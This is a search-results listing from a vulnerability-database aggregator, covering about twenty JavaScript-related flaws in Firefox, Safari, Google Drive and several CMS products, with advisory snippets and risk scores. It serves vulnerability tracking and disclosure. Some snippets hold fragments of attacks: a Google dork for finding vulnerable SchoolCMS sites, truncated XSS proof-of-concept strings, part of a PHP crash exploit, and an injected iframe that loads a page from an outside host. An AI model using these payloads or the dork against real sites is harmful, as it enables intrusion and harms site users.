667 matches found

The Hacker News
added 2013/03/15 3:21 p.m. | 11 views

Script Execution flaw in Google drive poses security threat

Once again, the Google Security Team has shot itself in the foot. Ansuman Samantaray, an Indian penetration tester, discovered a small but creative security flaw in Google Drive that poses a phishing threat to millions of Google users; the Google Security Team ignored it, replying that "It is just a mare...

AI score: 6.8
Exploits: 0

0day.today
added 2012/12/06 12:00 a.m. | 18 views

NVIDIA Install Application 2.1002.85.551 Buffer Overflow Vulnerability

NVIDIA Install Application version 2.1002.85.551 NVI2.dll unicode buffer overflow proof of concept exploit. The vulnerability is caused due to a boundary error in NVI2.DLL when handling the value assigned to the 'pDirectory' string variable in the 'AddPackages' function and can be exploited to...

AI score: 7.6
Exploits: 0

OpenVAS
added 2012/12/04 12:00 a.m. | 34 views

Ubuntu Update for firefox USN-1638-3

Ubuntu Update for Linux kernel vulnerabilities USN-1638-3 OpenVAS Vulnerability Test $Id: gbubuntuUSN16383.nasl 7960 2017-12-01 06:58:16Z santu $ Ubuntu Update for firefox USN-1638-3 Authors: System Generated Check Copyright: Copyright c 2012 Greenbone Networks GmbH, http://www.greenbone.net This...

CVSS: 10 | AI score: 1 | EPSS: 0.11079
Exploits: 16 | References: 2

Packet Storm
added 2012/12/03 12:00 a.m. | 15 views

SchoolCMS Cross Site Scripting

Title: SchoolCMS Persistant XSS. Date: 03/12/12 Author: VipVince Vendor: www.poweritschools.com Google Dork: /oldcore/cal/eventform.php Tested on: Windows. This is a Persistant XSS used in the software by many schools. About 225 results 0.21 seconds The vulnerability lies in the eventform.php fil...

Exploits: 0

RedHat Linux
added 2012/07/17 6:51 p.m. | 4 views

Mozilla: JSDependentString::undepend string conversion results in memory corruption (MFSA 2012-52)

Use-after-free vulnerability in the JSDependentString::undepend function in Mozilla Firefox 4.x through 13.0, Firefox ESR 10.x before 10.0.6, Thunderbird 5.0 through 13.0, Thunderbird ESR 10.x before 10.0.6, and SeaMonkey before 2.11 allows remote attackers to cause a denial of service (memory...

CVSS: 10 | AI score: 7.8 | EPSS: 0.05488
Exploits: 0 | References: 4

ThreatPost
added 2012/03/23 6:46 p.m. | 15 views

iOS JavaScript Bug Can Lead to Spoofed Sites

Apple’s iOS thus far has proven to be fairly resistant to malware and some other forms of attack, but that doesn’t mean that it is completely in the clear. A new vulnerability discovered by a researcher at a German security firm enables an attacker to take advantage of some odd JavaScript behavio...

AI score: 1.3
Exploits: 0 | References: 2

Prion
added 2012/02/24 1:55 p.m. | 14 views

Directory traversal

Directory traversal vulnerability in frontend/core/engine/javascript.php in Fork CMS 3.2.4 and possibly other versions before 3.2.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the module parameter to frontend/js.php...

CVSS: 5 | AI score: 7.2 | EPSS: 0.01929
Exploits: 1 | References: 5 | Affected Software: 1

OpenVAS
added 2011/08/27 12:00 a.m. | 36 views

Ubuntu: Security Advisory (USN-1185-1)

The remote host is missing an update for the SPDX-FileCopyrightText: 2011 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

CVSS: 10 | AI score: 9.8 | EPSS: 0.05556
Exploits: 1 | References: 2

Prion
added 2011/08/18 6:55 p.m. | 21 views

Memory corruption

The browser engine in Mozilla Firefox 4.x through 5, SeaMonkey 2.x before 2.3, Thunderbird before 6, and possibly other products does not properly implement JavaScript, which allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary...

CVSS: 10 | AI score: 8.5 | EPSS: 0.04483
Exploits: 1 | References: 7 | Affected Software: 3

ThreatPost
added 2011/07/19 4:13 p.m. | 7 views

Malicious PDF Attack Baiting Defense Industry Victims

There has been a spate of spear-phishing attacks against a number of high-profile targets in the last few months, including RSA and others, and that trend is continuing unabated. Researchers have come across a fresh attack using the familiar malicious PDF attachment that appears to be targeting...

AI score: 1.4
Exploits: 0 | References: 5

Packet Storm
added 2011/03/27 12:00 a.m. | 29 views

FengOffice 1.7.4 Cross Site Scripting

--Description-- A reflected cross-site scripting vulnerability in FengOffice 1.7.4 can be exploited to execute arbitrary JavaScript. --PoC-- alert0" / alert0" /...

AI score: 7.4
Exploits: 0

Exploit DB
added 2011/01/30 12:00 a.m. | 44 views

Maxthon Browser 3.0.20.1000 - ref / replace Denial of Service

Exploit Title: Maxthon Browser v3.0.20.1000 .ref .replace DOS Date: January 30 2011 Author: Carlos Mario Penagos Hollmann Software Link: http://dl.maxthon.com/mx3/mx3.0.20.3000.exe Version: v3.0.20.1000 Tested on: Windows xp sp3 ,windows 7 ,linux running on VMware Fusion 3.1 and VirtualBox 3.2.8...

AI score: 7.4
Exploits: 0

Exploit DB
added 2010/12/22 12:00 a.m. | 33 views

Apple iOS Safari - 'JS .' Remote Crash

Apple iPhone 3 Safari JavaScript - dot / '.' Remote Crash . = '$string'; "; iffileputcontents"./crash.html", $code echo"Point your safari mobile browser to crash.html.\r\n"; else echo"Cannot create file.\r\n"; ?...

AI score: 7.4
Exploits: 0

CVE
added 2010/12/10 6:00 p.m. | 87 views

CVE-2010-3773

CVE-2010-3773 affects Mozilla Firefox before 3.5.16 and 3.6.x before 3.6.13, and SeaMonkey before 2.0.11. The flaw involves the XMLHttpRequestSpy module in the Firebug add-on mishandling interaction between the XMLHttpRequestSpy object and chrome privileged objects, allowing remote attackers to e...

CVSS: 6.8 | AI score: 9.4 | EPSS: 0.03083
Exploits: 0 | References: 17 | Affected Software: 1

VulnCheck KEV
added 2010/10/27 12:00 a.m. | 5 views

VulnCheck KEV: CVE-2010-3765

Mozilla Firefox, SeaMonkey, and Thunderbird contain an unspecified vulnerability when JavaScript is enabled. This allows remote attackers to execute arbitrary code via vectors related to nsCSSFrameConstructor::ContentAppended, the appendChild method, incorrect index tracking, and the creation...

CVSS: 9.8 | AI score: 7.7 | EPSS: 0.83279
Exploits: 14 | References: 1

UbuntuCve
added 2010/04/05 12:00 a.m. | 30 views

CVE-2010-0176

Mozilla Firefox before 3.0.19, 3.5.x before 3.5.9, and 3.6.x before 3.6.2; Thunderbird before 3.0.4; and SeaMonkey before 2.0.4 do not properly manage reference counts for option elements in a XUL tree optgroup, which might allow remote attackers to execute arbitrary code via unspecified vectors...

CVSS: 9.3 | AI score: 7.6 | EPSS: 0.05203
Exploits: 0 | References: 3

myhack58
added 2010/01/30 12:00 a.m. | 13 views

Sohu 2010 show channel malicious code injection vulnerability - 0day vulnerability warning - the black bar safety net

The show section's chat feature does not strictly filter user input, which allows malicious code to be inserted into the page. Test code: document. write"iframe width='1 0 0 0' height=1 0 0 0' src='http://www.hackqing.cn/mm.htm/iframe";...

AI score: 0.5
Exploits: 0

Prion
added 2009/09/09 5:30 p.m. | 13 views

Cross site scripting

Unspecified vulnerability in Adium before 1.2 has unknown impact and attack vectors related to javascript: URLs, possibly cross-site scripting (XSS)...

CVSS: 10 | AI score: 6.4 | EPSS: 0.01219
Exploits: 0 | References: 2 | Affected Software: 1

securityvulns
added 2009/07/22 12:00 a.m. | 56 views

Mozilla Foundation Security Advisory 2009-37

Mozilla Foundation Security Advisory 2009-37 Title: Crash and remote code execution using watch and defineSetter on SVG element Impact: Critical Announced: July 21, 2009 Reporter: PenPal Products: Firefox Fixed in: Firefox 3.5 Firefox 3.0.12 Description Security researcher PenPal reported a crash...

CVSS: 10 | AI score: 0.3 | EPSS: 0.05557
Exploits: 1

Cvelist
added 2009/07/07 11:00 p.m. | 39 views

CVE-2009-2351

Opera 9.52 and earlier does not block javascript: URIs in Refresh headers in HTTP responses, which allows remote attackers to conduct cross-site scripting (XSS) attacks via vectors related to (1) injecting a Refresh header or (2) specifying the content of a Refresh header, a related issue to...

AI score: 8.8 | EPSS: 0.01709
Exploits: 1 | References: 5